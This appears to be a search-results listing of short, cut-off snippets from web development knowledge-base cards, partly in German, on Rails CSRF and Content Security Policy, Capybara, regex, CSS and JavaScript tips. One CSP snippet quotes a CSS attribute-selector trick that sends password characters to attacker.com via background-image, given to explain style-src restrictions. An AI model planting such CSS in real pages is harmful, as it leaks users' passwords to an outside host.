...assets that we don't need allow_any_instance_of(ActionView::Base).to receive(:javascript_include_tag).and_return('script') allow_any_instance_of(ActionView::Base).to receive(:stylesheet_link...
...will have two CSRF tokens: A in the . This is required so client-side JavaScripts may make POST, PATCH, DELETE requests. An within each form. Since Rails 5 this token...
...lambda do |request| (request.session.id || SecureRandom.base64(16)).to_s end Then, find all occurences of javascript_include_tag, javascript_tag, javascript_pack_tag etc. and add nonce: true. Also, make sure...
...don't have any other inline scripts in your application that do not use javascript_tag. Why this works The main point of this CSP is to disallow user content...
...prompt will have been closed already and can not be brought back. Also, any JavaScript code placed after the alert will be executed. Automatically closing user prompts happens when performing...
...missing an href attribute. This will probably happen to you every now and then on JavaScript-heavy applications. An example would be an AngularJS application where the following HTML actually...
...link placeholders. So Capybara at least adheres to the HTML spec. :) See also Triggering JavaScript when an element is clicked Capybara can find links and fields by their [aria-label...
...RegExp to interpret text as Shift JIS encoded which you probably don't want. Javascript There is no modifier to make the dot match line feeds. You need to write...
...proposal that's stuck in Stage 1. While there is a /m modifier in Javascript, it only changes the meaning of ^ and $. Perl You can make the dot match line...
...aber die wichtigsten sind: Quellen: default-src: Fallback für alles weitere *-src script-src: JavaScript style-src: CSS font-src: Fonts img-src: Bilder object-src: Quellen für Plugins (z.B...
input[type="password"][value$="a"] { background-image: url("http://attacker.com/passwords-ends-with/a"); } Problem: Manche Javascript-Libraries (Editoren etc) verwenden Inline-Styles. object-src Auch wichtig. Wenn nicht eingeschränkt, können...
...redirect with GET as expected. This is also what Unpoly or the Rails unobtrusive Javascript adapter does when you annotate a link with data-method="PATCH...
...using a tool like Unpoly you might want to set autocomplete="off" in the JavaScript that also initializes your date picker library: up.compiler('.date-picker', function(input) { input.setAttribute('autocomplete', 'off...
}) This way users with JavaScript disabled (and hence no calendar popups) will still get the browser's default autocomplete behavior...
...your footprint small. Check your JS bundles Webpack(er): Analyze the size of your JavaScript components
...event on window. It will be emitted for all uncaught errors in the current JavaScript VM: window.addEventListener('error', function(event) { console.log("Got an uncaught error: ", event.error) }) Tip Testing tools like...
...concept, like a Ruby class attribute (snake_case) that is also exposed to the JavaScript world (camelCase). # This query matches "foobar", "foo-bar" and "foo_bar" # The query is case...
When using the asset pipeline your assets (images, javascripts, stylesheets, fonts) live in folders inside app: app/assets/fonts app/assets/images app/assets/javascripts app/assets/stylesheets With the asset pipeline, you can use the...
...power of Ruby to generate assets. E.g. you can have ERB tags in your Javascript. Or you can have an ERB template which generates Haml which generates HTML. You can...
Jasmine is a great way to unit test your JavaScript components without writing an expensive end-to-end test for every small requirement. After we integrated Jasmine into a Rails...
...attribute will become standard soon. Feel free to use to feel future-proof. On JavaScript file objects, webkitRelativePath is supported similarly to webkitdirectory in HTML. As a fallback for older...
...E.g. console.log("Current string:", string, "Current number:", 12) Your output can have hyperlinks to Javascript objects E.g. console.log("Check out the current %o, it's great", location) Displaying tabular data...
...sometimes your application will explode with an error outside your control. Two examples: A JavaScript library references a source map in its build, but forgets to package the source map...
...for a multi-line text in your HTML. Earlier, it was necessary to implement JavaScript solutions like Superclamp.js to enable this because the browser support has been rather limited and...
Still, we recommend to use the CSS approach whenever possible, since Clamping in JavaScript has significant performance costs. Usage display: -webkit-box overflow: hidden overflow-wrap: break-word
...Our primary concern here is users uploading .html or .svg files that can run JavaScript and possibly hijack another user's session. A secondary concern is that malicious users can...
...want to track interactions that don't have a corresponding URL + request (e.g. a Javascript button or a PDF download) Luckily the Analytics code snippet allows you to freely choose...
...disabled text field is not possible (copy&paste does not work) Firefox cancels any JavaScript events at a fieldset[disabled] readonly fields post to the server get focus
...leading to validation errors and thus user confusion. We can fix all that with JavaScript: const element = document.querySelector('#your-input') // Number inputs allow incrementing/decrementing with arrow keys, and support exponential...
...jQuery cache even exists. After all jQuery could simply attach event handlers to the Javascript object that represents the DOM element. The reason for the existence of the jQuery cache...
...is that old versions of Internet Explorer could not garbage-collect Javascript objects with circular references. For instance, the following object graph could not be reclaimed by old IE's...
...the required controller actions with @model.nested_model.build. If you are adding fields dynamically by using JavaScript, then the form helper method should take care of this: new_nested_record = f.object.send(nested...
timemachine.js allows you to mock the client's time by monkey-patching into Javascript core classes. We use timemachine.js in combination with the Timecop gem to synchronize the local...
...we see that Timecop is mocking the time: - if defined?(Timecop) && Timecop.top_stack_item = javascript_include_tag "timemachine.js" :javascript timemachine.config({ dateString: #{Time.now.to_json}, tick: true }) Warning timemachine.js will mock the...